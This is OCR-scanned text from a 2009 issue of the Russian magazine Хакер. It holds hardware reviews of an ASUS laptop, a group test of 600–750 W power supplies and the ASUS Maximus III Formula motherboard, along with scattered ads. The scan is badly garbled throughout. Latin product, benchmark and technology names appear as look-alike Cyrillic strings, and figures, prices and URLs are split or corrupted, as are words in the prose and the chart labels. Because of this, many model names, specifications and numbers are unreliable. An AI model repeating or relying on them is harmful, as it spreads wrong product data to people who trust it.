• Порты: 3x115В, ѴѲА, РЮМІ, 2хАибіо, кард-ридер 
4-в-1 (ЗО/МЗ/хО/ММС) 

• Коммуникации: ѴѴі-Рі 802.1 1 Ь/д/п, ВІиеІооіЬ 
2.1+ЕОР, 46 ѴѴіМАХ, І_АЫ 

• Батарея: 5600 мАч, Ы-іоп 

• Размеры, вес: 351x243x34 мм 

• Вес: 2,1 5 кг 

• Цена: 33 00 рублей 



АППАРАТНАЯ КОМПЛЕКТАЦИЯ 

Нам уже приходилось встречаться с реализацией подобной технологии, 
но встретить подобное на ноутбуке, не предназначенном для игро- 
вых целей, было несколько необычно, хоть и радостно. Итак, важной 
деталью ноутбука А51І5 ІД.80Ѵ является, конечно, присутствие еще 
одного, более мощного видеочипа, а именно ЫѴЮІАОеРогсе 6210М. 
Стоит отметить, что пользователь может переключаться между графикой 
I пТеІ и ІМѴЮІА, не покидая оболочки операционной системы. Реали- 
зация технологии поддерживается стандартным набором микросхем 
Іпіеі 0545, без применения других компонентов. Система выполнит 
задачу автоматически, если пользователь сделает выбор в сторону 
высокопроизводительного профиля работы. Под дисплеем находится 
специальная клавиша, при нажатии которой можно сделать ставку в 
пользулибо режима энергосбережения (интегрированная графика] 
либо профиля «ЫдЬ ре По гт а псе» (дискретная графика]. Что касается 
других моментов, то ноутбук оснащен винчестером емкостью 500 Гбайт, 
а также модулем ѴѴіМАХ, та к что обладатель сего чуда будет укомплекто- 
ван всем набором радостей жизни. Естественно, разведен на одной из 
панелей НОМІ-выход, а также присутствуют три разъема 115В. В целом 
картина более чем положительная, однако не помешал бы для полно- 
го боекомплекта еще и слот Ехргезз СагсІ. Он был бы полезен тем, кто 
захочет использовать вкупе с системой более качественную аудиокарту, 
например, или 05М-модем, хотя здесь и без того достаточно средств 
коммуникации, да и предела совершенству в принципе не наблюдается. 

ВНЕШНИЙ ВИД И ОСОБЕННОСТИ 

Размеры ноутбука таковы, что у пользователя не возникнет про- 
блем как при использовании устройства в стесненныхусловиях (в 
путешествии, на работе], так и во время досуга. В конце концов, 14 
дюймов вполне достаточно, чтобы смотреть с комфортом даже ИО- 
видео. Следует отметить, что дисплей отличается высоким уровнем 
яркости и возможностью работы при разрешении до 1366x768 точек. 
Акустическая система представлена компанией АІТес Еапзіпд, дина- 
миками которой компания А51І5 оснащает свои самые интересные 
решения, и А51І5 ІЛ80Ѵ не стал исключением. Динамики неплохие, 
передают сигнал достаточно хорошо, а запаса громкости хватит, 
чтобы обладатель рассматриваемого компьютера мог насладиться 
фильмом в компании своих друзей. Отходя оттемы функционала, уде- 
лим немного внимания дизайну. Ноутбук собран в корпусе из черного 
лакированного пластика. Известно также, что появятся в продаже 
и модели серого цвета. Черный выглядит максимально строго и 
наиболее элегантно, но при этом на черной лакированной поверх- 
ности лучше будут заметны пятна и легкие царапины. Кстати, крышка 



РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ: 

ЗирегРІ тосі.1 .5 Х5, 1 М: 47,8 с 
ѴѴіпРАР: 914 Кбайт/с 
ЗОМагк’ОЗ: 4325 
ЗОМагк’Об: 1448 
СгузІаІМагк 2004Р2: 80274 
ОеекЬепсЬ: 2345 

РаззМагк Регіогтапсе Тезі: 91 5,4 
Температура процессора: 5 1 °С 
Температура жесткого диска: 34.5 °С 
Экономный режим: 6 ч 09 мин 
Работа с ѴѴі-Рі :5ч 11 мин 
Просмотр видео: 4 ч 20 мин 



устройства изготовлена из матового алюминия, что придает А51І5 
ІЛ80Ѵ еще больше экстравагантного шарма. 

СРЕДСТВАУПРАВЛЕНИЯ 

Есть еще несколько деталей, о которых нельзя не рассказать. В частности, 
это клавиатура и тачпад. Раскладка выполнена по последней моде — акку- 
ратные клавиши низкой посадки, пространство между которыми убрано под 
декоративную решетку. Набиратьтекст можно в любом режиме и практи- 
чески при любыхусловиях. Клавиатура лишена миниатюрных, неудобных 
кнопок — все расположено максимально удобно и за это стоит сказать 
инженерам А5И5 отдельное спасибо. Что касается сенсорной панели, то 
она выделяется на общем фоне корпуса только за счет фактурных элементов 
на поверхности. Сенсорная панель поддержи ваеттехнологию «мультитач», 
та к что о бл а дател ь н оутбу ка м ожет спомощьюдвух пальце впер ел и стывать 
изображения или с помощью трех симулировать работу правой кнопки 
мышки. В целом все работает классно, и никаких претензий тут не возникло. 

выводы 

В очередной раз инженерам А51І5 удалось доказать, что ноутбуки 
этой марки — оптимальный выбор по соотношению цена/качество. 

По крайней мере, это заявление вполне справедливо по отношению к 
линейке мобильных компьютеров А51І5 II Е. НоутбукА5Ц5 ІЛ80Ѵ отлича- 
ется, прежде всего, элегантной внешностью, может работать, минимум, 
четыре часа в режиме максимальной нагрузки, обладает высокой про- 
изводительностью и взаимозаменяемой графикой. В целом ощущения 
отустройства крайне положительные, и редакцией А51І5 ІЛ80Ѵ может 
быть смело рекомендован для приобретения. □□ 




ТРЕМРСШВ 



Подробнее о ноутбуках А5 1)5 серии М и других гаджетах вы можете узнать 
в новом дискуссионном сообществе на гепсІсІиЬ.ги . ТгепсІ Сіи Ь — дис- 
куссионный клуб для тех, кто интересуется прогрессом и задумывается о 
будущем. Участники ТгепсІ Сіи Ь обсуждаюттехнические новинки, инфор- 
мационныетехнологии, футурологию и другиетемы завтрашнего дня. 
ТгепсІ Сіи Ь поддерживается компаниями Іпіеіи А51І5 и проводит регу- 
лярные конкурсы с ценными призами. 

Корпорация I піеі, ведущий мировой производитель инновационных полупро- 
водниковых компонентов, разрабатываеттехнологии, продукцию и инициативы, 
направленные на постоянное повышение качества жизни людей и совершенст- 
вование методов их работы. Дополнительную информацию о корпорации Іпіеі 
можно найти на ѴѴеЬ-сервере компании Іпіеі ШрУАл/ѵѵѵѵ.іпІеІ.ги . а также на сайте 
ЬНрУ/ЬІодз. іпіеі. сот . Для получения дополнительной информации о рейтинге 
процессоров Іпіеі посетите сайт ѵѵѵѵѵѵ.іпіеі.ги/гаііпд . 
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РЕВВІІЛЛ 



Нірег 



Ыасіаіро 

СР-АР70І 



■ АВТОР: СЕРГЕИ НИКИТИН ТЕСТЕР: ЕВГЕНИИ ПОПОВ 



3625-611 



ІР80РШ5 

700ѴѴ 



П 



сіаіроѵѵег 

■АР700СА 



Р5Р80РШ5 

700ѴѴ 



ТЬегтаНаке 

Тоидкроѵѵег 

ХТ650ѴѴ 





Согзаіг 

НХ750ѴѴ 



ТЬегтаНаке 

ТоидІіроѵѵег 



с 




0Р0В0М 




Апіес 




здоровый бп 



ТЕСТИРОВАНИЕ БЛОКОВ ПИТАНИЯ МОЩНОСТЬЮ ОТ 600 ВТ 



БЕЗ ЗТ0Г0 КОМПОНЕНТА НЕ БУДУТ РАБОТАТЬ И ДОСТАВЛЯТЬ ТЕБЕ РАДОСТЬ ОТ ОБЩЕНИЯ 
С ВИРТУАЛЬНОСТЬЮ НИ МОЩНЕЙШИЙ ПРОЦЕССОР, НИ ВИДЕОПЛАТА ПОСЛЕДНЕЙ 
МОДЕЛИ, НИ СВЕРХБЫСТРАЯ ПАМЯТЬ, НИ ЛЮБЫЕ ДРУГИЕ КОМПОНЕНТЫ ТВОЕГО 
СИСТЕМНОГО БЛОКА, КАКИМИ БЫ ПЕРВОКЛАССНЫМИ ОНИ БЫ НЕ БЫЛИ. ЗТО БЛОК 
ПИТАНИЯ. СЕГОДНЯ МЫ РАССМОТРИМ УСТРОЙСТВА, НАИБОЛЕЕ ПОПУЛЯРНЫЕ У 
БОЛЬШИНСТВА ПОЛЬЗОВАТЕЛЕЙ - БП МОЩНОСТЬЮ ОТ 600 ВТ. 



МЕТОДИКА 

ТЕСТИРОВАНИЯ 

Тестирование блоков питания мы проводили в не- 
сколько этапов. Первоначально это было простое 
визуальное изучение устройства - мы обращали 
внимание на качество сборки. Вторым шагом был 
разбор блока питания, для изучения качества 
его начинки: насоченьинтересовалосечение 
проводов, количество и качество конденсаторов, 
есть ли в БП дроссели на выходе и входе, а также 
насколько качественно и аккуратно смонтирована 
вся начинка. Третий шагзаключался в изучении 
шума, издаваемого устройством. Для чистоты 
эксперимента натестовом ПКбыли демонтирова- 
ны все вентиляторы, которые были заменены на 
радиаторы — на чипсете, процессоре и видеоп- 
лате. Причемуровеньшума фиксировался не на 
«холодном» БП, а через час непрерывной работы. 
Завершалатестирование, наверное, самая 
важная техническая часть, входе которой мы 
измеряли КПД и коэффициент мощности пред- 
ставленных блоков питания, в зависимости от 
нагрузки. Для этого мы применяли специальный 



нагрузочный модуль, который способен выдавать 
определенную нагрузку, что позволяетснимать 
значения интересующих нас параметров при 
зафиксированных значениях мощности. 

ТЕХНОЛОГИИ 

К выбору блока питания нужно подходить очень 
серьезно по нескольким причинам. Во-пер- 
вых, это устройство заменяется не так часто, 
как процессоры, видеоплаты ит.д. Поэтому 
вложения в него оправданы. Во-вторых, от 
негооченьмногоезависит:хороший БП не 
просто предоставляет питание всем остальным 
компонентам, но и можетзащитить компьютер от 
некоторых проблем с электричеством, которые 
обычно чреваты перегоревшими компонентами, 
требующими дорогостоящей замены. Такчто, 
вложенные сейчас в хороший блок питания 
деньги могут сэкономитьтебе много времени 
и нервов впоследствии. Выбирая БП, нужно, 
в первую очередь, обратить внимание на его 
вес — хороший, качественный блокпитания по 
определению не можетбыть легким. Если же 



это так, то можно сделать вывод о профнепри- 
годности — легковесность БП говоритотом, что 
при его производстве было сэкономлено немало 
компонентов, без которых не получить хорошего 
блока питания. Главный параметр, на который 
обычно обращаетвнимание каждый покупа- 
тель Р5ЕІ, это мощность. Естественно, чем она 
больше, тем выше и цена устройства. Сегодня 
уже не редкость блоки питания мощностью 1000 
Вт и более, но нужен ли тебе такой монстр? Эти 
устройства предназначены для ультраигровых 
ПК, оснащенных несколькими видеоплатами 
и прочими излишествами, которые требуют 
большого количества энергии. Современному 
домашнему компьютеру даже мощной игровой 
машине, соЗЫ- или СгоззЕіге-конфигурацией, 
будет в пол не достаточно БП мощностью до 
750-800 Вт (850-900 Вт в крайне редких случаях). 
Конечно, учитывая долгожительство блоков 
питания в наших корпусах, неплохо бы иметь 
небольшой запас в 50 Втс прицелом на будущее, 
но вложения в перспективу нужно планировать, 
учитывая текущее финансовое состояние. 
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ТЕСТИРУЕМОЕ ОБОРУДОВАНИЕ: 




ТЕСТОВЫЙ СТЕНД 


АИТЕС ЕАРТНѴѴАТТЗ 750ѴѴ 




ПРОЦЕССОР, МГЦ: 2200, АМ0 АТНЮИ 64 3500+ (50СКЕТ 939) 


СОКЗАІК НХ750ѴѴ 




СИСТЕМНАЯ ПЛАТА: АЮАТР0М К85И 


Р5Р80РІЦ5700ѴѴ 




ПАМЯТЬ, МБ: 2X512, С0Р5АІР ѴАШЕ 5ЕІ.ЕСТ ООР-400 


6І.АСІАІ.Р0ѴѴЕВ ВР-АР700СА 




ВИДЕОПЛАТА, МБ: 1024, 6І6АВѴТЕ СЕР0РСЕ СТ5 250 


НІРЕР 5625-311 




ВИНЧЕСТЕР, ГБ: 80, 5ЕА0АТЕ ВАРРАСІША 7200 ОБ/МИН, ЮЕ 


ТНЕРМАІЛАКЕ Т01І6НР0ѴѴЕРХТ 650ѴѴ 




НАГРУЗОЧНЫЙ ЬРТ-БЛОК: Р0РМ02А РОѴІ/ЕРСНЕСК 2.0 




АИТЕС 

ЕАРТНѴШТЗ 750ѴѴ 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТИП: ГИБРИДНЫЙ 
ЗАЯВЛЕННАЯ МОЩНОСТЬ: 750 ВТ 
РАЗЪЕМЫ: 9 (МОБЕХ), 9 (5АТА), 1 (РОО), 2 (РСІ 

ВЕНТИЛЯТОРЫ, ММ: 1X135 
СХЕМА КОРРЕКЦИИ: АКТИВНАЯ 



+ 

Коэффициент полезного действия — это важный параметр любого блока 
питания. В этом плане БП не сплоховал. Во-первых, производитель 
утверждает, что его творение потребляетнатретьменьшеэнергии, чем 
аналоги от конкурентов. Это утверждение мы проверить не в силах, а вот 
логотип соответствия стандарту 80 Ріиз, говорящий отом, что КПД блока 
питания не ниже 80%, как раз поддается оценке — и наш тест показал, 
что никакого обмана тут нет. Другой особенностью устройства является 
гибридная схема подсоединения шлейфов — часть из нихзакреплена 
намертво, а воттри разъема модульные, то есть к ним кабели под- 
ключаешь™ сам, в зависимости отсвоих потребностей. Один изтрех 
предназначен для кабеля РСІ-Е, к двум оставшимся можно подключать 
шлейфы стакими разъемами какЭАТА или Моіех. Представленная 
схема, какминимум, интересна и довольно эффективна. 




По 12-вольтовой линии присутствуют просадки, которые никак нельзя 
назвать нормальными. 




СОРЗАІР 

НХ750ѴѴ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТИП: МОДУЛЬНЫЙ 
ЗАЯВЛЕННАЯ МОЩНОСТЬ, ВТ: 750 
РАЗЪЕМЫ:8 (МОБЕХ), 12 (БАТА], 2 (БОБ), 4 (РСІ-Е) 

ВЕНТИЛЯТОРЫ, ММ: 1X140 
СХЕМА КОРРЕКЦИИ: АКТИВНАЯ 





Этот блок питания имеет на себе клеймо 80 Ріиз ОоШ, что означает его 
соответствие самому строгому стандарту, регламентирующему уровень 
КПД БП. Чтобы заслужить та кой логотип, КПД Р5ЕІ должен составлять 
не менее 87% при нагрузке в 20 и 100 процентов. А при нагрузке в 50% 
требования еще более жесткие, в этом случае коэффициент полезного 
действия должен равняться 90%. Такие устройства самые дорогие и 
самые лучшие, и их нетакмного. Нашитесты подтвердили то, что БП не 
зря получил логотип. Впрочем, Согзаіг НХ750ѴѴоправдываетсвою цену 
нетолько качеством, но и комплектом поставки: упакован в стильный ме- 
шочек, а все кабели (они подключаются и отключаются по необходимос- 
ти] — в небольшой сумочке. Нужно добавить, что шума БП издает совсем 
немного (только если нагрузка составляет свыше 400 Вт, вентилятор 
раскручивается больше 1 000 оборотов в минуту], и еще не сильно греется. 



Мы не зря присудили этому блоку питания победу втесте и наивысшую 
оценку — единственным его недостатком можно счесть мрачный черный 
корпус. 
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РЕВКІІМ 



СВОДНАЯ ТАБЛИЦА. 

КПД ПРИ ПИКОВОЙ НАГРУЗКЕ % 



ТИегтаІІаке ХТ 650 ѴѴ 
Нірег5б25-61) 

61асіаІроѵѵег6Р-АР700СА 
Р5Р80РШ5 700 ѴѴ 
СогзаігНХ 750 ѴѴ 
Апіес ЕагНіѵѵаИз 750 ѴѴ 

О 10 20 30 40 50 60 70 80 90 



И ОПЯТЬ С0Р5АІК ЛУЧШИЙ, НА ЭТОТ РАЗ В РАБОТЕ ПРИ ПИКОВОЙ 
НАГРУЗКЕ 



КОЭФФИЦИЕНТ МОЩНОСТИ ПРИ 
ПИКОВОЙ НАГРУЗКЕ 



ТИегтаІІаке ХТ 650 ѴУ 
Нірег5б25-01) 

61асіаІроѵѵег6Р-АР700СА 
Р5Р80РШ5 700 ѴУ 
СогзаігНХ 750 ѴУ 
Апіес ЕагіНѵуаИз 750 ѴУ 

О 0.2 0.4 0.6 



0.8 1 



ВСЕУЧАСТНИКИ ТЕСТИРОВАНИЯ ДЕМОНСТРИРУЮТ НЕПЛОХИЕ 
РЕЗУЛЬТАТЫ 




РЗР80РШЗ 

700ѴѴ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТИП: МОДУЛЬНЫЙ 
ЗАЯВЛЕННАЯ МОЩНОСТЬ, ВТ: 700 
РАЗЪЕМЫ: 3 (МОЬЕХ), 3 (5АТА), 1 (РОО), 2 (РСІ-Е) 

ВЕНТИЛЯТОРЫ, ММ: 1X120 
СХЕМА КОРРЕКЦИИ: АКТИВНАЯ 







Модель мощностью 700 Вт от компании Е5Р смотрится очень стильно: 
имеется подсветка, корпус выкрашен в веселый синий цвет, а решетка 
над вентилятором золотистая. Помимо внешних красот, блок питания 
может похвастаться соответствием стандарту 8 ОРІ 115 , что самым положи- 
тельным образом сказывается на его работе. В комплект поставки входят 
специальные фиксаторы, которые помогуттебе аккуратно расположить 
шлейфы и провода внутри корпуса. Все кабели, которые тянутся к или от 
блока питания, имеют разноцветную оплетку, чтобы ты не ошибся при 
монтаже. 




6І.АСІАІ.Р0ѴѴЕК 
6Р-АР700СА 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТИП: СТАНДАРТНЫЙ 

ЗАЯВЛЕННАЯ МОЩНОСТЬ, ВТ: 700 
РАЗЪЕМЫ: 6 (МОЬЕХ), 6 (5АТА), 1 (РОО), 2 (РСІ-Е) 

ВЕНТИЛЯТОРЫ, ММ: 1X140 
СХЕМА КОРРЕКЦИИ: АКТИВНАЯ 



□ □□ 



+ 

Всегда приятно исследовать новое, а не уже хорошо знакомое уст- 
ройство, а на момент написания статьи упоминаний о Сіасіаіроѵѵег 
6Р-АР700СА не было даже на сайте производителя. Набор шлейфов и 
разъемов включает в себя все самое необходимое: присутствуют шесть 
молексов и столько же 5АТА-коннекторов, пара линий РСІ-Е (могут из 
6 - быть переделаны в 8 -контактные). Проверив блокпитания на предмет 
просадок по линиям 3, 5 и 12 В мы не обнаружили особых проблем, что ха- 
рактеризуетустройство с положительной стороны. Экстерьер устройства 
обычный: 120 -мм вентилятор, черный корпус и так далее, все стандартно, 
надежно и без особых изысков. 



Из шлейфов, что впаяны в БП, есть один РСІ-Е, но лишь для работы 
в 6 -контактном режиме. В коробке мы обнаружили только три допол- 
нительных шлейфа: стремя разъемами типа Моіех, линию РСІ-Е с 
возможностью превращения шести контактов в восемь, а также кабель с 
тремя же коннекторами 5АТА. Получается, что, возможно, тебе придется 
докупать кабели. 



Нашетехническое исследование показало, что коэффициент полезного 
действия этого блока питания не превышает80%. Это, конечно, не го- 
ворит, что он плохой, но, учитывая, что из всего ассортимента БП Оіасіаі 
Роѵѵе г стандарту 80 Ріиз соответствуют только пять устройств, можно 
сказать: пока уровень этих блоков питания отнюдь не самый высокий. 






Твой СогЬу 

говорит за тебя 



, і 

кі 



5ЛМ51ШС 

гл 




Затзипд 

тоЬІІе 

ѵѵѵі/ѵі/.затзипдтоЬіІе.ги 



Затзипд СогЬу 

Новый стильный тачфон 

• Большой сенсорный ТРТ-дисплей 
с разрешением 240x320 

• Интерфейс ТоисІпѴѴіг 

с поддержкой виджетов 

• РМ-радио 

• Молодежная тема (Сагіооп III) 

• Предустановленный словарь 

• Три сменные панели в комплекте 



Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), ѵѵѵѵѵѵ.затзипд.сот. Товар сертифицирован. Реклама. 



8ЛМ8ІШ6 




НІРЕК 

3625-611 



ЯМЙ&Ъ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТИП: СТАНДАРТНЫЙ 

ЗАЯВЛЕННАЯ МОЩНОСТЬ, ВТ: 625 
РАЗЪЕМЫ: 5 (МОЫЕХ), 4 (5АТА), 1 (РОО, 2 (РСІ- 

ВЕНТИЛЯТОРЫ: 1X120 
СХЕМА КОРРЕКЦИИ: АКТИВНАЯ 



+ 

Известный производитель блоков питания компания Нірег выпустила 
новинку, рассчитанную на самый широкий круг потребителей. Описывае- 
мое устройство, помимо мощности 625 Вт (а наши тесты показали, что оно 
выдерживает 700 Втпиковой нагрузки], обладаетдвумя сертификатами: 
80 Ріиз Вгопге, который обещает нам КПД не меньше 85%, что является 
оченьхорошим показателем, а также ІМѴЮІАЗи, который гарантирует 
наличие двух независимых линий РСІ-Е. Внутри стального корпуса мы 
обнаружили очень качественно и аккуратно размещенные элементы, 
которые охлаждаются системой, состоящей из алюминиевых радиаторов 
и 120-мм вентилятора. 




Система подключения кабелей не модульная, дополнительные шлейфы 
просто присоединяются косновным. С одной стороны, корпус забивается 
некоей толикой лишних проводов, с другой, цена устройства от этого 
заметно снижается. Крометого, отсутствует 8- контактный разъем РСІ-Е. 





ТНЕРМАШКЕШ6НР0ѴѴЕР 
ХТ 650ѴѴ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ТИП: МОДУЛЬНЫЙ 
ЗАЯВЛЕННАЯ МОЩНОСТЬ, ВТ: 650 
РАЗЪЕМЫ: 7 (МОЬЕХ], 6 (5АТА), 2 [ГОП], 4 (РСІ- 

ВЕНТИЛЯТОРЫ, ММ: 1X140 
СХЕМА КОРРЕКЦИИ: АКТИВНАЯ 

■■■■■■■■■□ 

+ 

Еще один блок питания, номинальная мощность которого сильно 
отличается оттого, что он на самом деле может выдержать. Произво- 
дительуказал 650 Вт, но нашетестированиеубедительно доказало, что 
БП может выдержать пиковую нагрузку на 100 Втбольше! Крометого, он 
работает практически бесшумно, только при нагрузке, которая превы- 
шает350 Вт, вентилятор напоминаето себе (а при пиковой нагрузке его 
скорость достигает 1900 оборотов]. Необычным дополнением является 
сигнальная панель, на которой горит зеленая лампочка в случае нор- 
мальной работы, а красная предупреждает о том, что выходное напря- 
жение превышает рассчитанное или жара внутри корпуса зашкаливает 
за 50 градусов. Другой интересной функцией является Еап Сооі Оеіау, 
позволяющая вентилятору работать некоторое время после отключения 
БП (15 или 30 минут]. Такое решение позволяет продлить срок службы 
блока питания. 




Высокая цена этого устройства является его главным недостатком. 
Других мы не смогли обнаружить. 



выводы 

Наш тест показал, что современные блоки 
питания из самого популярного сегмента 
мощностью до 700 Вт представляют собой 



очень качественные устройства. Приз «Луч- 
шая покупка» достается устройству Нірег 
5625-61), обладающему крайне привлека- 
тельной ценой и неплохими характеристи- 



ками. А«Выбор редакции» достается блоку 
питания Согзаіг НХ750ѴѴ, который проде- 
монстрировал самые лучшие показатели во 
всех тестах, іні 



► 022 



ХАКЕР 12 /132/ 09 





Прошла всего неделя, а Петр уже стал самым востребованным 
фотографом среди друзей на вечеринках 



ІЬНЫЙ 
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Ыікоп 

Основа изображения 



С недавних пор 
Петр фотографирует 
просто великолепно 





КОМПАНИЯ АЗОВ ХОРОШО ИЗВЕСТНА НЕ ТОЛЬКО СВОИМИ ПРОДУКТАМИ ПОТРЕБИ- 
ТЕЛЬСКОГО СЕКТОРА, НО И УЗКОСПЕЦИАЛИЗИРОВАННЫМИ РЕШЕНИЯМИ, РАССЧИТАН- 
НЫМИ В ПЕРВУЮ ОЧЕРЕДЬ НА ЭНТУЗИАСТОВ. ТАК, НЕДАВНО БЫЛА ПРЕДСТАВЛЕНА 
СИСТЕМНАЯ ПЛАТА АЗОВ МАХІМИЗ III ЕОКМШ.А СЕРИИ К.0.6. (РЕРІМІС ОР 0АМЕР5), 
РАССЧИТАННАЯ НА РАБОТУ С ПРОЦЕССОРАМИ ШТЕЬ ДЛЯ РАЗЪЕМА 50СКЕТ ЮА1156. 
УСТРОЙСТВО, БЕЗ СОМНЕНИЯ, ИНТЕРЕСНОЕ - И ИМЕННО П03Т0МУ МЫ РЕШИЛИ УДЕ- 
ЛИТЬ НОВОЙ ПЛАТФОРМЕ САМОЕ ПРИСТАЛЬНОЕ ВНИМАНИЕ. 



ОВЕРКЛОКЕРУ НА ЗАМЕТКУ 

Все настройки, связанные с разгоном, можно 
осуществлять в меню Ехіхете Тѵѵеакег 
непосредственно в ВІ05 системной платы. 
Сама система ввода/вывода представлена 
версией АМІ В 105 ѵ. 02.6 1 . В разделе ты най- 
дешь широчайший набор настроек, описать 
полный набор в формате нашей статьи доста- 
точно сложно. Скажем только, что здесь, по- 
мимо основной массы регулировок, присутс- 
твует возможность калибровки напряжения 
на самом процессоре, на его контроллере, 
напряжения на чипсете, контроля амплитуды 



напряжения на чипсете ина процессоре, так- 
тового сигнал чипсета. И все это не говоря о 
многочисленных частотах. Естественно, есть 
опция автоматического разгона. Серьезно 
увеличить производительность ЦП можно 
благодаря технологии СРІЧ ЦеѵеШР. Что 
интересно — предусмотрена аналогичная 
опция и для памяти (Метогу Ееѵеі И Р) . Из 
оболочки операционной системы с настрой- 
ками можно работать с помощью удобной 
утилиты под названием А51І5 ТигЬоѴ Еѵо. За- 
пуск и перезагрузку всей системы при конфи- 
гурации и первоначальной настройке можно 
осуществлять с помощью ярких клавиш 



«5іаг1» и «Везеі» без подключения к самому 
корпусу. Кстати, плата оснащена еще одной, 
специальной «красной кнопкой», которая 
получила название Со ВиІЧоп. Если система 
выключена, то при нажатии кнопки можно 
активировать технологию А51І5 МетОК, 
которая позволяет компьютеру запуститься 
даже с несовместимыми с системной платой 
модулями оперативной памяти. В частности, 
будет произведена диагностика и заданы 
необходимые параметры ОЗУ для успешного 
старта системы. Если система работает, то 
нажатие на клавишу позволит пользователю 
менять оверклокерские профили, причем, не 



► 024 



ХАКЕР 12 /132/ 09 





ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 



ТЕСТОВЫЙ СТЕНД 




ПРОЦЕССОР: ШТЕЬ СОР 
КУЛЕР: ТНЕРМАІ.РІВНТ 
ПАМЯТЬ: 2Х 2048 МБАЙ 
(СМЗХ261600С90НХИУ] 
НАКОПИТЕЛЬ: 250 ГБАИ 
ѴШ502АВѴЗ, 5АТА 
ВИДЕОКАРТА: 6І6АВУТІ 
БЛОК ПИТАНИЯ: 650 ВТ, 


Е 15-750, 2.66 ГГЦ 
МЦХ-120 

Т. СОРЗАІР СМХЗ-1600 

Т, ѴѴЕЗТЕКМ ОіеіТАЬ 

Е 6ЕР0КСЕ 0ТЗ 250 
СОРЗАІР 



покидая оболочки операционной системы. Всего этих профилей может 
быть задано восемь. 

ДИЗАЙН И РАЗВОДКА 

Долго говорить о том, что плата упакована в шикарную коробку с аг- 
рессивной расцветкой, и расписывать все прелести комплектации 
мы не будем. Уж слишком много есть более интересного, о чем хо- 
телось бы поведать нашим читателям. Начнем с того, что плата соб- 
рана в форм-факторе Риіі АТХ. Расцветка платы без преувеличения 
«революционная» — черный текстолит, красные и белые разъемы. 
Внешне плата нам очень понравилась. Компоновка элементов мак- 
симально удобна для установки любого типа дополнительных плат и 
систем охлаждения. Даже огромные видеокарты верхнего ценового 
сегмента устанавливаются легко, не мешают доступу к другим эле- 
ментам системы. Хотя при установке пары двухслотовых акселерато- 
ров в 5І_І или Сгоззііге будутзаблокированы клавиши перезагрузки 
и включения. В остальном претензий нет. Даже радиаторы на схемах 
М05ЕЕТ не мешают монтажу кулера с широким профилем. Кстати, 
что касается охлаждения, то и этой детали про из водитель удел ил 
максимум внимания. На единственную схему набора логики I пііеі Р55 
Ехргезз установлен плоский массивный радиатор. Если учесть, что 
этот чип отличается невысоким тепловыделением (большую часть 
задач взял на себя сам ЦП], такой выбор кажется весьма разумным. 
Три фигурных радиатора, соединенные тепловыми трубками, надеж- 
но защищают систему питания от перегрева. Стабилизатор питания 
собран по схеме 16+3. Все дроссели аккуратно распаяны, а сама 
плата использует исключительно твердотельные конденсаторы. 
Увеличить производительность дисковой подсистемы возможно при 
помощи технологии Бреесііпд ИОО. В данном случае два винчестера 
подключаются к специальным разъемам 5Р0_Н001 и 5Р0_Н002 
для организации двухканальной передачи данных. 

ФИШКИ И БОНУСЫ 

Отдельно хотелось бы поговорить о дополнительных возможностях и 
дополнениях, которыми может порадовать как сама плата, так и ком- 
плект поставки. В первую очередь нужно отметить наличие внешней 
аудиокарты. Приверженцы качественного звука как один отказыва- 
ются от встроенных звуковых контроллеров, вне зависимости оттого, 
сколько каналов предлагает штатный НОА-кодек. В случае с А51І5 



•ПОДДЕРЖИВАЕМЫЕ ПРОЦЕССОРЫ: ШТЕІ. СОРЕ 15 ИЛИ 
СОРЕ 17 

•ПРОЦЕССОРНЫЙ РАЗЪЕМ: ЗОСКЕТ КЗА1156 
•ЧИПСЕТ: ШТЕЬ Р55 ЕХРРЕЗЗ 
•ПАМЯТЬ: 4Х ОІММ, ООРЗ 

2133/2000/1800/1600/1333/1066 (МАКСИМАЛЬНО 16 
ГБАЙТ) 

•СЛОТЫ РАСШИРЕНИЯ: IX РСІ-Е Х16, IX РСІ-ЕХРРЕЗЗ 
Х8, 1ХРСІ-ЕХ1, 1ХРСІ 
•НАКОПИТЕЛИ: 10Х 5АТА II + IX Е-5АТА 
•РАЗЪЕМЫ: IX ІЕЕЕ 1394 (РІРЕѴШЕ), 9Х ЦЗВ, IX 
Е-5АТА 

•СЕТЬ: 1 ГИГАБИТНЫЙ Р.І-45 ПРИ ПОДДЕРЖКЕ КОНТ- 
РОЛЛЕРА РЕАЬТЕК РТЮ1105С 
•ЗВУК: 8-КАНАЛЬНАЯ ВНЕШНЯЯ НОА-АУДИОПЛАТА 
ЗЦРРЕМЕРХ Х-РІ 

•ФОРМ-ФАКТОР: АТХ, 305X244 ММ 



МАХІМИ5 III Еогтиіа производитель включил в комплект поставки 
карточку А511 5 Биргете ЕХХ-Еі, которая использует для подключе- 
ния разъем РСІ-ЕхргеззХІ . Присутствует разделение каналов по 
восьми линиям, а также наличествует поддержка технологий ЕАХ 
АбѵапсесІ НО 4.0, Х-Еі СМББ-ЗО и Х-Еі Огузка Иге г. Есть здесь оптичес- 
кий и коаксиальный 5Р0ІЕ, а также специальный разъем для вывода 
аудиовходов (наушники и микрофон) на лицевую панель корпуса. 
Наконец, заметим, что производитель оснастил комплект набором 
стяжекдля шлейфов, что крайне полезно, и специальными наклей- 
ками-метками, которые позволяют к каждому шлейфу приделать свой 
цветовой маркер. Скажем, если в системе 4-5 винчестеров плюс пара 
оптических приводов с БАТА-интерфейсом, то такая разметка была бы 
к месту. Интересно также, что производитель решил вынести клавишу 
сброса СМ05 на заднюю панель платы, чтобы не было необходимости 
лазить внутрь корпуса. На панели есть и кнопка активации опции РОС 
СоппесЕ Суть технологии — в возможности предоставления дистан- 
ционного доступа косновным параметрам материнской платы через 
другой компьютер. Соединение при использовании РОС Соппесі; 
производится через обычный ІІБВ-кабель. 

ВЫВОДЫ 

В очередной раз АБИ 5 удалось доказать свое превосходство на 
рынке системных плат для экстремалов. Такие платформы, как 
А51І5 МАХІМІІ5 III Еогтиіа, являют собой торжество технологи- 
ческого прогресса. Отходя от восторженных откликов в сторону 
